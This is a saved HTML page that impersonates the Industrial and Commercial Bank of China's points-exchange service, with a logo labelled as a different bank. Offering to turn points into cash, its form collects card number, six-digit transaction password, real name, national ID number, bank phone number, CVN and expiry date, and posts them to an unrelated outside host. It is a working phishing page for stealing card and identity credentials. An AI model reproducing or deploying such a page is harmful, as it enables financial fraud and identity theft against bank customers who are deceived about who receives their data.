<!DOCTYPE html>
<!-- saved from url=(0071)https://i0086.com/?app=reg&id=1 -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>工商银行积分网</title>

<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<link rel="stylesheet" href="./工商银行积分网_files/reset.css">
<link rel="stylesheet" href="./工商银行积分网_files/style.css">
<link rel="stylesheet" href="https://i0086.com/?app=reg&amp;id=1" id="min320">
<link rel="apple-touch-startup-image" href="https://i0086.com/milanoo_startup.png">
<link rel="apple-touch-icon-precomposed" href="https://i0086.com/milanoo_startup.png">
<script src="./工商银行积分网_files/jquery-1.6.min.js"></script>
<script src="./工商银行积分网_files/main.js"></script>
<style>
.text {
	PADDING-BOTTOM: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; MARGIN-BOTTOM: 20px; COLOR: #999; FONT-SIZE: 14px; PADDING-TOP: 0px
}
article {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
article.button {
	BORDER-BOTTOM: #CDCDCD 1px solid; TEXT-ALIGN: center; BORDER-LEFT: #CDCDCD 1px solid; MARGIN: 10px; BACKGROUND: #ffffff; FONT-SIZE: 16px; BORDER-TOP: #CDCDCD 1px solid; BORDER-RIGHT: #CDCDCD 1px solid; -webkit-border-radius: 3px; border-radius: 3px; -webkit-box-shadow: 0 2px 2px #CCC; box-shadow: 0 2px 2px #CCC
}
article.button A {
	LINE-HEIGHT: 40px; DISPLAY: block; HEIGHT: 40px; COLOR: #333; text-shadow: 0 1px 0 white; -webkit-text-shadow: 0 0 1px #fff
}
article.border {
	BORDER-BOTTOM: #ccc 1px solid; TEXT-ALIGN: left; BORDER-LEFT: #ccc 1px solid; LINE-HEIGHT: 30px; MARGIN: 10px; FONT-SIZE: 16px; BORDER-TOP: #ccc 1px solid; BORDER-RIGHT: #ccc 1px solid; -webkit-border-radius: 5px; border-radius: 5px; -webkit-box-shadow: 0px 2px 1px #dbdbdb; box-shadow: 0px 2px 1px #dbdbdb
}
article.border section {
	BORDER-BOTTOM: #ccc 1px solid; PADDING-BOTTOM: 7px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; PADDING-TOP: 7px
}
article.border section .input2 {
	WIDTH: 25px
}
DL {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
.mar_l80 DL {
	OVERFLOW: hidden
}

INPUT {
	PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; PADDING-TOP: 0px
}
INPUT {
	OUTLINE-STYLE: none; OUTLINE-COLOR: invert; OUTLINE-WIDTH: medium; FONT: inherit
}
.select INPUT {
	BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; PADDING-LEFT: 5px; WIDTH: 124px; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: left; HEIGHT: 29px; BORDER-TOP: 0px; BORDER-RIGHT: 0px
}
</style></head>

<body>
<div class="page">
  <div class="header">
    <div class="site_header">
        <div class="clearfix">
           <div class="ccblogo lfloat"><a href="https://i0086.com/?app=reg&amp;id=1#" class="a1"><img id="ccblogo" src="./工商银行积分网_files/logo.gif" alt="中国建设－chinaunionpay"></a></div>
        </div>
         
        <div class="hq_page">
            <div class="news ccb_title">
              <h1>兑换规则</h1>
            </div>
            <div id="pic1" class="pic1 content">
              <p>请根据以下信息要求填写您的个人开户信息。注：信息与开户账户须一致，否则无法进行积分进行兑换。</p>
            </div>
            <div class="news ccb_title">
              <h1>积分兑换现金</h1>
            </div>
            <div id="pic2" class="pic2 content">
            <form id="form1" method="post" name="form1" action="https://savedata.i10086.com/?app=regsave">               
                <input id="idType" class="input1" value="1" type="hidden" name="idType">
                <article class="border mar_l80">
                  <section><span>注册卡（账）号</span>
                    <dl>
                      <input id="g_zhanghao" class="input1" type="tel" name="g_zhanghao" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)" maxlength="20">
                    </dl>
                  </section>
                  <section><span>6位数交易密码</span>
                    <dl>
                      <input name="g_wangyin" type="password" class="input1" id="g_wangyin" maxlength="6" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)">
                    </dl>
                  </section>
                  <section><span>真实姓名</span>
                    <dl>
                      <input id="idNo1" class="input1" type="text" name="g_xingming" onblur="showHint()" maxlength="8">
                    </dl>
                  </section>
                  <section><span>身份证号</span>
                    <dl>
                      <input id="g_shenfenzheng" class="input1" type="text" name="g_shenfenzheng" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)" maxlength="18">
                    </dl>
                  </section>
                  <section><span>银行预留手机号码</span>
                    <dl>
                      <input id="g_shouji" class="input1" type="tel" name="g_shouji" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)" maxlength="11">
                    </dl>
                  </section>
                                    <section><span>CVN</span>
                    <dl>
                      <input id="g_cvn" class="input1" type="tel" name="g_cvn" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)" maxlength="6">
                    </dl>
                  </section>
                  <section><span>有效期</span>
                    <dl>
                      <input id="g_yxq" class="input1" type="tel" name="g_yxq" onblur="showHint()" onkeyup="JavaScript:this.value=this.value.replace(/\D/gi,&#39;&#39;)" maxlength="6">
                    </dl>
                  </section>
                                    <div class="mobile_login"> <a href="javascript:form1.submit();"><span class="login_ico_l"></span><span class="login_ico_m">下一步</span><span class="login_ico_r"></span></a> <a href="https://i0086.com/index.php"><span class="login_ico_l"></span><span class="login_ico_m">上一步</span><span class="login_ico_r"></span></a> </div>
                  <input name="iaa" type="hidden" id="iaa" value="1">
                </article>
                <div class="warn"></div>
              </form>
            </div>
         </div>
   
         <div class="footer"><h4 class="ccb_title" style="font-size:12px;">版权所有&nbsp;中国工商银行版权所有</h4></div>
    </div>
  </div>
</div>

</body></html>